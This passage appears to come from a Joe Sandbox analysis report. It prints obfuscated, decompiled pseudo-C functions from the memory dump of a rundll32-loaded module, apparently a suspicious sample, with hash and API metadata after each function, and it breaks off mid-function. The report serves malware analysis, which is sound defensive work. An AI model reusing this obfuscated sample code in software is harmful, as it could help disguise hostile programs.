                				 *((intOrPtr*)(_t167 + 0x608)) = 2;
                				 *((intOrPtr*)(_t167 + 0x60c)) = 1;
                				 *((intOrPtr*)(_t167 + 0x610)) = 0x375c;
                				_t135 =  *((intOrPtr*)(_t167 + 0x20));
                				 *((long long*)(_t167 + 8)) = 0x390b;
                				 *((long long*)(_t135 + 0x470)) = 0x2839;
                				goto 0x535f8eda;
                				_t186 = _t120;
                				 *(_t167 + 0x110) =  *(_t167 + 0x110) | _t135;
                				 *(_t167 + 0x128) =  *(_t167 + 0x128) * ((r10d ^ _t186) -  *((intOrPtr*)(_t167 + 0x5e0)));
                				_t139 =  *(_t167 + 0x158) ^ _t186;
                				 *(_t167 + 0x108) =  *(_t167 + 0x108) - _t139;
                				FindNextFileA(_t211);
                				InitializeCriticalSection(_t209);
                				 *(_t167 + 0x4b8) =  *(_t167 + 0x4b8) ^ _t139;
                				goto 0x535f8eda;
                				_t205 = r15d;
                				if (_t205 - ( *(_t167 + 0x398) &  *(_t167 + 0x40)) *  *(_t167 + 0x70) < 0) goto 0x535f8eda;
                				_t203 = r9d;
                				if ( *((intOrPtr*)(_t167 + 0x370)) != _t203) goto 0x535f8ec0;
                				_t200 = r14d;
                				 *(_t167 + 0x108) =  *(_t167 + 0x108) ^  *((intOrPtr*)(_t167 + 0x410)) -  *((intOrPtr*)(_t167 + 0x80)) ^ _t200;
                				_t189 = ( *(_t167 + 0x110) * 0x000011f1 ^  *(_t167 + 0x3a0)) * (_t190 + 0x1582);
                				 *(_t167 + 0x3a0) = _t189;
                				 *(_t167 + 0xa0) =  *(_t167 + 0xa0) | ( *((intOrPtr*)(_t167 + 0x338)) + _t203) * _t189;
                				 *(_t167 + 0x3c0) =  *(_t167 + 0x3c0) |  *(_t167 + 0x480) ^  *(_t167 + 0xb0) ^ _t200;
                				 *(_t167 + 0x240) =  *(_t167 + 0x240) ^ (r13d | 0x0000145c |  *(_t167 + 0x40));
                				 *(_t167 + 0x148) =  *(_t167 + 0x148) * (__r10 + 0x1355 + ( *(_t167 + 0x378) ^ r9d ^ 0x00000bbb) * (__rsi + _t194) -  *((intOrPtr*)(_t167 + 0x250)));
                				 *((intOrPtr*)(_t167 + 0x2e0)) =  *((intOrPtr*)(_t167 + 0x2e0)) + ( *((intOrPtr*)(_t167 + 0xd0)) - 0x00001ba7 &  *(_t167 + 0x4b0));
                				 *(_t167 + 0x1d0) =  *(_t167 + 0x1d0) ^ ( *(_t167 + 0x230) & _t125) + _t205;
                				 *(_t167 + 0xc8) =  *(_t167 + 0xc8) * ( *(_t167 + 0x238) | _t200);
                				goto 0x535f8eda;
                				 *((intOrPtr*)(_t167 + 0xd0)) =  *((intOrPtr*)(_t167 + 0xd0)) +  *((intOrPtr*)(_t167 + 0x80)) - (_t120 & r10d);
                				if (_t125 != _t211 + 0x1487) goto 0x535f8f0a;
                				 *((intOrPtr*)(_t167 + 0x614)) = 0x10f9e;
                				if (_t209 - 0x22d == __rsi - 0x13a) goto 0x535f8f0a;
                				 *((intOrPtr*)(_t167 + 0x618)) = 0xb;
                				return _t190 - 0x19;
                			}

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: CriticalFileFindInitializeNextSection
                • String ID:
                • API String ID: 1152700987-0
                • Opcode ID: 33d821c9519403da0d6fd2cd1bd47c6fad23d7059bad394a0bec873c92478540
                • Instruction ID: 88fff150171db728ac913b517a5de528ee4dc3909f97fb835b49a95d93dd9a28
                • Opcode Fuzzy Hash: 33d821c9519403da0d6fd2cd1bd47c6fad23d7059bad394a0bec873c92478540
                • Instruction Fuzzy Hash: DF712473615B848ADB54CF24D4953AA33A9F784B4CF099036CE4E9A358EF78E295C710
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E00007FFA7FFA535F84F0(void* __ecx, void* __edx, void* __edi, void* __esi, void* __esp, long long __rbx, long long __rsi, signed int __r8, void* __r9) {
                				void* __rdi;
                				void* _t282;
                				long long _t284;
                				intOrPtr _t290;
                				signed int _t330;
                				signed long long _t340;
                				signed long long _t342;
                				void* _t344;
                				void* _t374;
                				signed long long _t385;
                				signed long long _t387;
                				signed long long _t391;
                				signed long long _t394;
                				long long _t399;
                				signed int _t400;
                				void* _t402;
                				void* _t403;
                				signed long long _t416;
                				struct _CRITICAL_SECTION* _t427;
                				long long* _t428;
                				signed long long _t430;
                				struct _CRITICAL_SECTION* _t432;
                				void* _t434;
                				signed long long _t435;
                				void* _t437;
                				intOrPtr* _t438;
                
                				_t396 = __rsi;
                				_t282 = _t402;
                				 *((long long*)(_t282 + 8)) = __rbx;
                				 *((long long*)(_t282 + 0x10)) = _t399;
                				 *((long long*)(_t282 + 0x18)) = __rsi;
                				 *(_t282 + 0x20) = r9d;
                				_t403 = _t402 - 0x70;
                				r9d = r9d + 0x6c3;
                				_t400 = __r8;
                				r10d =  *(_t403 + 0xc0);
                				 *((intOrPtr*)(_t403 + 0xe8)) =  *((intOrPtr*)(_t403 + 0xe8)) + 0xfffff9e0;
                				r12d = _t282 - 0x1ad7;
                				 *(_t403 + 0x50) = r12d;
                				 *((intOrPtr*)(_t403 + 0x58)) =  *(_t403 + 0xf0) + 0xfffff71a;
                				r8d = _t374 + 0x4f3;
                				r15d = _t344 - 0x1ec0;
                				r10d = r10d + 0xffffeaeb;
                				 *(_t403 + 0x54) = r9d;
                				 *(_t403 + 0xf0) = r8d;
                				r13d = _t344 - 0xc13;
                				 *(_t403 + 0xd8) = r10d;
                				r14d = _t282 + 0x9c9;
                				 *(_t403 + 0xd0) = r14d;
                				 *(_t403 + 0xc0) =  *(_t403 + 0xe0) + 0xfffff9e5;
                				if ( *((intOrPtr*)(_t403 + 0xc8)) - r9d <= 0) goto 0x535f8bdb;
                				if (r14d -  *(_t403 + 0xd0) <= 0) goto 0x535f8bdb;
                				if (r8d - _t432 + 0x89a > 0) goto 0x535f88c3;
                				_t284 =  *((intOrPtr*)(__r8 + 0x468));
                				 *((intOrPtr*)(_t284 + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x358)) + 0x148)) + 0x610e;
                				 *((intOrPtr*)(__r8 + 0x3e0))();
                				 *((long long*)(__r8 + 0x3d8)) = _t284;
                				r13d = 0x1352;
                				 *( *((intOrPtr*)(__r8 + 0x240)) + 0x450) =  *( *((intOrPtr*)(__r8 + 0x240)) + 0x450) * ( *((intOrPtr*)(__r8 + 0x5f8)) + 0x181f);
                				 *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x110)) + 0x3c8)) =  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x110)) + 0x3c8)) - ( *( *((intOrPtr*)(__r8 + 0x2a0)) + 0x230) ^ 0x00001320);
                				 *((long long*)( *((intOrPtr*)(__r8 + 0x5e8)) + 0xa8)) =  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x110)) + 0x90)) + 0xbbb;
                				_t290 =  *((intOrPtr*)(__r8 + 0x358));
                				if ( *((intOrPtr*)(_t290 + 0x148)) == _t432) goto 0x535f8881;
                				_t48 = _t400 + 0x280; // 0x15d2
                				_t438 = _t48;
                				_t49 = _t400 + 0x25a; // 0x15ac
                				_t428 = _t49;
                				r8d = 0;
                				_t340 = __r8 * 0xd;
                				 *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x358)) + 0x390)) =  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x358)) + 0x390)) + _t290 -  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x358)) + 0x190));
                				 *( *((intOrPtr*)(__r8 + 0x108)) + 0x28) =  *( *((intOrPtr*)(__r8 + 0x108)) + 0x28) |  *( *((intOrPtr*)(__r8 + 0x358)) + 0x358) ^ 0x00001582;
                				 *( *((intOrPtr*)(__r8 + 0x108)) + 0x1d0) =  *( *((intOrPtr*)(__r8 + 0x108)) + 0x1d0) |  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x358)) + 0x318)) - 0x0000181f;
                				 *(_t428 - 2) =  *( *((intOrPtr*)(__r8 + 0x2a0)) + 0x1b0) ^ 0x0000a493;
                				 *(( *(__r8 + 0x1b0) ^ 0x00001fd3) + 0xfffffda6 + _t428 + __r8 + 0x258) =  *( *((intOrPtr*)(__r8 + 0x5e8)) + 0x68) ^ 0xe3ff5482;
                				 *_t428 =  *((intOrPtr*)(_t438 + 0x30));
                				 *( *((intOrPtr*)(__r8 + 0x20)) + 0x128) =  *( *((intOrPtr*)(__r8 + 0x20)) + 0x128) * 0x15fd;
                				_t76 = _t400 + 0x204; // 0x1556
                				E00007FFA7FFA535E3B00( *( *((intOrPtr*)(__r8 + 0x5e8)) + 0x68) ^ 0xe3ff5482, __edi, 0, __esp, _t76 + _t340,  *_t438, 0xfffffda6 - __r8, __rsi,  *( *((intOrPtr*)(__r8 + 0x5e8)) + 0x148) ^ 0x00001358);
                				r9d = 0x16ce;
                				r8d = 0x10ae;
                				 *( *((intOrPtr*)(__r8 + 0x358)) + 0x470) =  *( *((intOrPtr*)(__r8 + 0x358)) + 0x470) ^  *( *((intOrPtr*)(__r8 + 0x5e8)) + 0x140);
                				 *( *((intOrPtr*)(__r8 + 0x5e8)) + 0x140) =  *( *((intOrPtr*)(__r8 + 0x5e8)) + 0x140) - 1;
                				 *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x358)) + 0x230)) =  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x358)) + 0x230)) -  *((intOrPtr*)( *((intOrPtr*)(__r8 + 0x108)) + 0x178));
                				 *((long long*)( *((intOrPtr*)(__r8 + 0x108)) + 0x178)) =  *((long long*)( *((intOrPtr*)(__r8 + 0x108)) + 0x178)) + 1;
                				_t95 = _t400 + 0x258; // 0x15aa
                				 *(_t403 + 0x28) = _t95 + _t340;
                				 *(_t403 + 0x20) =  *_t438;
                				E00007FFA7FFA535E1000( *_t438, __r8, _t396, _t437, _t434);
                				 *( *((intOrPtr*)(_t400 + 0x160)) + 0x3a0) =  *( *((intOrPtr*)(_t400 + 0x5e8)) + 0x190) ^ 0x000012ad;
                				 *( *((intOrPtr*)(_t400 + 0x5e8)) + 0x360) =  *( *((intOrPtr*)(_t400 + 0x5e8)) + 0x360) ^  *(_t400 + 0x298) + 0x00002114;
                				if (1 -  *((intOrPtr*)( *(_t400 + 0x358) + 0x148)) - _t432 < 0) goto 0x535f86b0;
                				 *((intOrPtr*)( *((intOrPtr*)(_t400 + 0x468)))) =  *((intOrPtr*)( *((intOrPtr*)(_t400 + 0x110)) + 0x70)) + 0x70694fe0;
                				r14d = r14d - 0x19f;
                				 *((intOrPtr*)( *((intOrPtr*)(_t400 + 0x468)) + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t400 + 0x5e8)) + 0x148)) + 0x2e736217;
                				goto 0x535f8bdb;
                				if (r12d - (r15d | r12d) < 0) goto 0x535f8b74;
                				_t391 =  *((intOrPtr*)(_t400 + 0x488));
                				_t385 =  *(_t400 + 0x450) & _t391 | 0x0000145c;
                				if ( *((intOrPtr*)(_t400 + 0x240)) != _t385) goto 0x535f89ad;
                				 *((long long*)(_t403 + 0x60)) =  *((intOrPtr*)(_t400 + 0x110)) +  *((intOrPtr*)(_t400 + 0x5e0));
                				 *((long long*)(_t403 + 0x68)) = (r10d |  *(_t400 + 0x1b0)) + 0xffffdeec;
                				_t435 =  *((intOrPtr*)(_t403 + 0x68));
                				_t430 =  *((intOrPtr*)(_t403 + 0x60));
                				_t342 = r13d | r12d;
                				r8d = r8d + 2;
                				r15d = r15d - ( *(_t400 + 0x140) + 0x00001320 & r15d);
                				if (r8d == _t385) goto 0x535f8964;
                				r14d =  *(_t403 + 0xd0);
                				r12d =  *(_t403 + 0x50);
                				 *(_t400 + 0x358) =  *(_t400 + 0x358) ^ _t430;
                				 *(_t400 + 0x5d8) =  *(_t400 + 0x5d8) * _t435;
                				 *(_t400 + 0x1a8) =  *(_t400 + 0x1a8) + _t342;
                				 *(_t400 + 0x398) =  *(_t400 + 0x248) * 0x1320;
                				r10d = r14d;
                				r11d =  *(_t400 + 0x2a0);
                				r13d = r13d |  *((intOrPtr*)(_t400 + 0x188)) - 0x00000c92;
                				r9d =  *(_t400 + 0x3a0);
                				_t146 = _t342 + 0xf15; // 0x13b2
                				r11d = r11d | _t146;
                				r10d = r10d &  *(_t403 + 0xd8);
                				r9d = r9d - 0x157a;
                				r9d = r9d |  *(_t400 + 0x68);
                				 *(_t400 + 0x350) =  *(_t400 + 0x350) ^ (_t391 -  *((intOrPtr*)(_t400 + 0x2a8)) |  *(_t403 + 0xf0));
                				 *(_t403 + 0x28) = r11d;
                				 *(_t403 + 0x20) = r10d;
                				EnterCriticalSection(_t432);
                				r10d = _t435 + _t430;
                				r11d =  *(_t400 + 0x70);
                				r11d = r11d +  *(_t400 + 0x358);
                				r8d =  *(_t400 + 0x2c8);
                				r9d =  *(_t403 + 0xe0);
                				r8d = r8d + 0x1320;
                				r10d = r10d |  *(_t400 + 0x140);
                				r9d = r9d + 0x421;
                				 *(_t403 + 0x40) = r8d;
                				_t394 =  *(_t403 + 0xb8);
                				r8d = 0;
                				 *(_t403 + 0x38) = r10d;
                				r11d = r11d * r12d;
                				 *(_t400 + 0x108) =  *(_t400 + 0x108) | r12d ^ 0x00001515;
                				_t330 = _t394 -  *((intOrPtr*)(_t400 + 0x5e8));
                				 *(_t400 + 0x1a8) = _t330;
                				 *(_t403 + 0x30) = r11d;
                				r9d = r9d +  *(_t403 + 0xd8) +  *((intOrPtr*)(_t400 + 0x3b8)) -  *(_t403 + 0xc0) - r14d;
                				 *(_t403 + 0x28) =  *(_t400 + 0x3c8) ^  *(_t400 + 0x298) | 0x00001ba7;
                				 *(_t403 + 0x20) = r9d;
                				E00007FFA7FFA535F6E94( *(_t400 + 0x3c8) ^  *(_t400 + 0x298) | 0x00001ba7,  *(_t403 + 0x54) & 0x0000181f,  *((intOrPtr*)(_t400 + 0x1d0)) +  *(_t403 + 0xf0) ^  *(_t403 + 0xb8), _t342,  *((intOrPtr*)(_t403 + 0xc8)) + 0xbbb +  *((intOrPtr*)(_t400 + 0x3c0)), _t385,  *(_t403 + 0xc0) *  *(_t403 + 0xb8), _t400,  *(_t400 + 0x5d8) * _t435);
                				 *(_t400 + 0xb0) =  *(_t400 + 0xb0) + _t330;
                				 *(_t400 + 0x3d0) =  *(_t400 + 0x3d0) ^  *(_t400 + 0x358) - 0x00001ba7;
                				r13d = r13d - ( *(_t400 + 0x298) *  *(_t400 + 0x108) ^ 0x00002114);
                				 *(_t400 + 0x108) =  *(_t400 + 0x108) ^ ( *(_t400 + 0x420) &  *(_t400 + 0x230)) * _t394;
                				 *((intOrPtr*)(_t400 + 0x80)) =  *((intOrPtr*)(_t400 + 0x80)) - (r13d |  *(_t400 + 0x3d0));
                				r15d = r15d -  *((intOrPtr*)(_t403 + 0xe8));
                				LeaveCriticalSection(_t427);
                				_t416 =  *((intOrPtr*)(_t403 + 0x58));
                				_t387 =  *(_t400 + 0x5d0) | _t416;
                				if ( *(_t400 + 0x3a0) - _t387 > 0) goto 0x535f8bdb;
                				r8d = r8d + 3;
                				if (r8d - _t387 <= 0) goto 0x535f8bae;
                				 *(_t400 + 0x1a8) =  *(_t400 + 0x1a8) ^ ( *(_t400 + 0x3d0) ^ _t416) +  *((intOrPtr*)(_t400 + 0x390));
                				 *(_t400 + 0x330) =  *(_t400 + 0x330) |  *(_t400 + 0xb0) | 0x0000145c;
                				return _t435 - 0x67b;
                			}

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: CriticalSection$EnterLeave
                • String ID:
                • API String ID: 3168844106-0
                • Opcode ID: 674b92217082d28ebc46bafaa8bb58fd24d44a2029d38b6f4e4f2f4262ba438a
                • Instruction ID: 02d6a5a93a868638aef57833eff24a1c7189564729fb9462f7a3ca9041d7cce2
                • Opcode Fuzzy Hash: 674b92217082d28ebc46bafaa8bb58fd24d44a2029d38b6f4e4f2f4262ba438a
                • Instruction Fuzzy Hash: 74022272614BC48ADB74CF25D8847EA77A9F788B88F054126DB8D5BB58DF38D690CB00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 73%
                			E00007FFA7FFA535F6898(void* __ebx, void* __ecx, void* __rax, void* __rcx, void* __rdx, void* __r8, void* __r9) {
                				void* __rbx;
                				void* __rsi;
                				void* __rbp;
                				signed int _t166;
                				signed int _t189;
                				signed int _t210;
                				signed int _t234;
                				void* _t244;
                				signed int _t245;
                				signed long long _t282;
                				signed long long _t289;
                				void* _t294;
                				signed int _t314;
                				void* _t323;
                				signed long long _t327;
                				void* _t328;
                				void* _t329;
                				intOrPtr _t330;
                				void* _t331;
                				signed long long _t335;
                				void* _t343;
                				void* _t344;
                				void* _t345;
                				void* _t346;
                				void* _t347;
                
                				_t332 = __r8;
                				_t323 = __rdx;
                				r12d =  *(_t331 + 0xd0);
                				r14d = __r8 - 0x1569;
                				r8d =  *(_t331 + 0xf0);
                				_t4 = _t323 - 0x54f; // -552
                				r11d = _t4;
                				_t244 = __r9 - 0x1ec0;
                				 *(_t331 + 0xe0) =  *(_t331 + 0xe0) + 0x2bc;
                				_t9 = _t323 + 0x54a; // 0x871
                				r10d = _t9;
                				_t330 =  *((intOrPtr*)(_t331 + 0xe8));
                				_t11 = _t323 - 0x15fd; // -4822
                				 *(_t331 + 0x50) = r11d;
                				 *(_t331 + 0xf0) = __r8 + 0xd0;
                				r13d = __rcx + 0x379;
                				 *(_t331 + 0xd0) = r14d;
                				r12d = r12d + 0xffffff29;
                				 *(_t331 + 0xb0) = __rcx - 0x6c0;
                				 *(_t331 + 0xc8) = r10d;
                				r9d = r9d + 0xffffedd2;
                				 *(_t331 + 0xc0) = __r8 - 0x1ad7;
                				 *(_t331 + 0xd8) = r9d;
                				r15d = __r8 - 0x1486;
                				if (r11d - _t344 + 0xb13 > 0) goto 0x535f6ad9;
                				 *((long long*)(_t330 + 0x430)) =  *((intOrPtr*)(_t330 + 0x150));
                				r15d = r15d + 0xa5d;
                				 *((long long*)( *(_t330 + 0x108) + 0x338)) = 0x262b;
                				r14d = r14d + 0x1b47;
                				 *( *(_t330 + 0x160) + 0x1a8) =  *( *((intOrPtr*)(_t330 + 0x2a0)) + 0x3b8) ^ 0x00001569;
                				r8d =  *(_t331 + 0xe0);
                				if (r11d - _t328 + 0xaf9 > 0) goto 0x535f6e7c;
                				if (r11d == _t344 + 0x1305) goto 0x535f69f7;
                				r14d = r14d - 0x89a;
                				r13d = r13d - 0x319;
                				if (r12d - _t345 - 0x887 >= 0) goto 0x535f6d8f;
                				r10d =  *(_t331 + 0xf0);
                				_t38 = _t332 - 0x249; // 0x73
                				r11d = __r9 + 0x68e;
                				r10d = r10d + 0xfffff9db;
                				r9d = r9d + 0xf15;
                				 *(_t331 + 0x38) = _t346 - 0x6f2;
                				 *(_t331 + 0x30) = _t38;
                				r8d = r8d + 0x94;
                				 *(_t331 + 0x28) = r10d;
                				 *(_t331 + 0x20) = r11d;
                				_t166 = E00007FFA7FFA535F7A40(_t11 + 0x12ad, _t244,  *(_t330 + 0x160), _t294,  *( *((intOrPtr*)(_t330 + 0x2a0)) + 0x3b8) ^ 0x00001569, _t330, __r8, __r9, _t343);
                				_t210 = _t328 + 0x467;
                				_t245 = _t244 + 0x1582;
                				r10d = _t345 - 0x4d9;
                				 *(_t331 + 0x48) = r10d;
                				r11d = _t346 + 0x2bc;
                				 *(_t331 + 0x40) = r11d;
                				r9d = _t344 + 0x9c7;
                				 *(_t331 + 0x38) = r13d;
                				r8d = _t346 - 0xbc;
                				 *(_t331 + 0x30) = _t210;
                				 *(_t331 + 0x28) =  *(_t331 + 0xd8) + 0x1348;
                				r15d = _t166;
                				 *(_t331 + 0x20) = _t245;
                				E00007FFA7FFA535F9C34();
                				r8d = 0x157a;
                				E00007FFA7FFA535FAF30(0x1b47, _t294, _t330, _t329, _t330, _t330);
                				goto 0x535f6e7c;
                				r8d = _t210;
                				goto 0x535f6b2e;
                				if ( *(_t330 + 0x110) - 0x11f1 <= 0) goto 0x535f6b27;
                				 *(_t330 + 0x240) =  *(_t330 + 0x240) * (r12d | 0x00001582);
                				r8d = r8d + 3;
                				if (r8d - ( *(_t330 + 0x340) | r14d) > 0) goto 0x535f6aee;
                				 *((intOrPtr*)(_t331 + 0xb8)) = ( *(_t330 + 0x250) ^ 0x00001ba7) - r14d;
                				if ( *((intOrPtr*)(_t330 + 0xa8)) -  *(_t331 + 0xf0) *  *(_t330 + 0x140) <= 0) goto 0x535f69c5;
                				 *(_t331 + 0x58) =  *(_t331 + 0xb0) ^ r14d;
                				r8d =  *(_t330 + 0x138);
                				r8d = r8d + 0x1320;
                				r12d = r12d * (r12d | 0x00001569);
                				 *(_t330 + 0x320) =  *(_t330 + 0x320) * ( *(_t330 + 0x3d0) -  *((intOrPtr*)(_t330 + 0x5e0)) -  *(_t330 + 0x110));
                				EnterCriticalSection(??);
                				 *(_t330 + 0x158) =  *(_t330 + 0x158) - ( *(_t330 + 0x178) ^  *(_t331 + 0xc0));
                				 *(_t331 + 0xe0) =  *(_t331 + 0xe0) - ( *(_t330 + 0x238) ^  *(_t331 + 0xd8) ^ 0x00001487);
                				r11d =  *(_t330 + 0x128);
                				r11d = r11d * _t210;
                				r11d = r11d & r14d;
                				 *(_t331 + 0x28) = r13d *  *(_t331 + 0xf0);
                				 *(_t331 + 0x20) = r11d;
                				GetLastError();
                				_t234 =  *(_t331 + 0xd0);
                				r8d =  *(_t331 + 0xe0);
                				r9d =  *(_t331 + 0xd8);
                				r8d = r8d +  *((intOrPtr*)(_t330 + 0x358)) - _t234;
                				 *(_t331 + 0xe0) = r8d;
                				 *(_t330 + 0x3d0) =  *(_t330 + 0x3d0) *  *(_t331 + 0x58);
                				 *(_t331 + 0xd0) = _t234 ^  *((intOrPtr*)(_t330 + 0x38)) + 0xffffee0f + _t245;
                				 *(_t330 + 0x160) =  *(_t330 + 0x160) | ( *(_t330 + 0x110) & r14d) -  *((intOrPtr*)(_t330 + 0x70));
                				 *(_t330 + 0x410) =  *(_t330 + 0x410) * ( *(_t330 + 0x158) |  *(_t330 + 0x108));
                				_t189 =  *(_t330 + 0x1d0) | 0x00000651;
                				_t327 = _t189;
                				 *(_t331 + 0xf0) = _t189;
                				_t282 =  *((intOrPtr*)(_t330 + 0x2e0)) + _t327 | 0x0000157a;
                				 *((intOrPtr*)(_t330 + 0x5d0)) =  *((intOrPtr*)(_t330 + 0x5d0)) + _t282;
                				 *((intOrPtr*)(_t331 + 0xb8)) =  *((intOrPtr*)(_t331 + 0xb8)) + 1;
                				if (_t282 -  *(_t330 + 0x140) * _t327 > 0) goto 0x535f6b74;
                				r10d =  *(_t331 + 0xc8);
                				r11d =  *(_t331 + 0x50);
                				goto 0x535f69cd;
                				_t314 = _t210;
                				if (_t314 -  *(_t330 + 0x3d0) +  *((intOrPtr*)(_t330 + 0x168)) > 0) goto 0x535f6e7c;
                				if (_t314 - ( *((intOrPtr*)(_t330 + 0x2a8)) + 0x00001ad7 ^  *(_t330 + 8)) >= 0) goto 0x535f6e7c;
                				_t335 =  *(_t330 + 0x110);
                				_t289 = r10d -  *((intOrPtr*)(_t330 + 0x230));
                				 *((intOrPtr*)(_t330 + 0x58)) =  *((intOrPtr*)(_t330 + 0x58)) + _t289;
                				 *(_t330 + 0x318) =  *(_t330 + 0x318) ^ _t289 * _t335;
                				 *((intOrPtr*)(_t330 + 0x300)) =  *((intOrPtr*)(_t330 + 0x300)) + _t329 - 0x181f;
                				r10d = r10d - (r15d | r13d) +  *((intOrPtr*)(_t330 + 0x420)) +  *((intOrPtr*)(_t330 + 0x2a8));
                				 *(_t330 + 0x110) =  *(_t330 + 0x320) + 0xfffffab6 + _t335;
                				 *((long long*)(_t330 + 0x418)) =  *((intOrPtr*)(_t330 + 0x198)) + 0x10ae;
                				r15d = r15d ^  *(_t330 + 0x108) -  *((intOrPtr*)(_t330 + 0x58)) + 0x00001fda;
                				 *(_t330 + 0x1d0) =  *(_t330 + 0x1d0) |  *(_t330 + 0x340) ^ 0x0000157a |  *(_t330 + 0x298) | r10d;
                				return _t347 - 0x650;
                			}

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: CriticalEnterErrorLastSection
                • String ID:
                • API String ID: 3668107397-0
                • Opcode ID: e664c20afb270eb3d76d07312c65cf6c1bd6d9867d7d1aa7209a603ec08a79f5
                • Instruction ID: bbce37362446a5f7e6105aa051ec284556b92b8b0cbafd4f6406950cbdf6777d
                • Opcode Fuzzy Hash: e664c20afb270eb3d76d07312c65cf6c1bd6d9867d7d1aa7209a603ec08a79f5
                • Instruction Fuzzy Hash: EAE14773614AC58ED734CF24E8817EA77A9F788748F005126DB4E9BB98DB78E654CB00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 81%
                			E00007FFA7FFA535F59E8(void* __eax, void* __ecx, void* __esi, long long __rbx, void* __rdx, long long __rsi, void* __r8, void* __r9, void* __r11) {
                				void* __rdi;
                				void* _t213;
                				signed int _t220;
                				signed int _t228;
                				void* _t249;
                				signed int _t251;
                				void* _t255;
                				void* _t261;
                				void* _t262;
                				void* _t270;
                				intOrPtr _t301;
                				void* _t321;
                				void* _t360;
                				intOrPtr _t363;
                				void* _t373;
                				long long _t377;
                				void* _t379;
                				void* _t380;
                				long long _t383;
                				void* _t385;
                				long long _t392;
                				signed short* _t393;
                				intOrPtr _t401;
                				signed long long _t402;
                				signed long long _t406;
                				CHAR* _t409;
                
                				_t360 = __rdx;
                				 *((long long*)(_t379 + 8)) = __rbx;
                				 *((long long*)(_t379 + 0x18)) = _t377;
                				 *((long long*)(_t379 + 0x20)) = __rsi;
                				_t380 = _t379 - 0x70;
                				_t5 = _t360 + 0x6c0; // 0x1b47
                				r10d = _t5;
                				_t373 = __r9;
                				r9d =  *(_t380 + 0xf8);
                				r11d = _t270 - 0x651;
                				 *(_t380 + 0xf8) = r10d;
                				r15d = _t270 + 0x14f6;
                				 *((intOrPtr*)(_t380 + 0xa8)) = r11d;
                				r8d = _t270 + 0x107d;
                				 *((intOrPtr*)(_t380 + 0x58)) = r15d;
                				 *((intOrPtr*)(_t380 + 0x50)) = __r9 - 0x1b47;
                				r12d = _t321 - 0x4ca;
                				 *(_t380 + 0xc8) =  *((intOrPtr*)(_t380 + 0xd0)) + 0xfffff9af;
                				_t251 = _t321 - 0x181f;
                				 *(_t380 + 0x60) = r12d;
                				 *(_t380 + 0x108) = _t270 + 0x7f5;
                				 *((intOrPtr*)(_t380 + 0xc0)) = _t270 - 0xc92;
                				if (r10d - _t377 + 0x1320 <= 0) goto 0x535f5f2a;
                				if (r8d ==  &(_t409[0x12f])) goto 0x535f5f2a;
                				if (__r9 - 0x5c5 - __rsi + 0x1fda >= 0) goto 0x535f5e75;
                				if ( *((long long*)(__r9 + 0x4a0)) == 0) goto 0x535f5f2a;
                				 *( *((intOrPtr*)(__r9 + 0x160)) + 0x250) =  *( *((intOrPtr*)(__r9 + 0x160)) + 0x250) |  *( *((intOrPtr*)(__r9 + 0x20)) + 0x3c0) | 0x00000c92;
                				 *((long long*)( *((intOrPtr*)(__r9 + 0x240)) + 0xb0)) =  *((long long*)( *((intOrPtr*)(__r9 + 0x240)) + 0xb0)) + 0xfe2db0b5;
                				 *( *((intOrPtr*)(__r9 + 0x20)) + 0x130) =  *( *((intOrPtr*)(__r9 + 0x20)) + 0x130) |  *((intOrPtr*)(__r9 + 0x240)) + 0x000003c8;
                				_t401 =  *((intOrPtr*)(__r9 + 0x120));
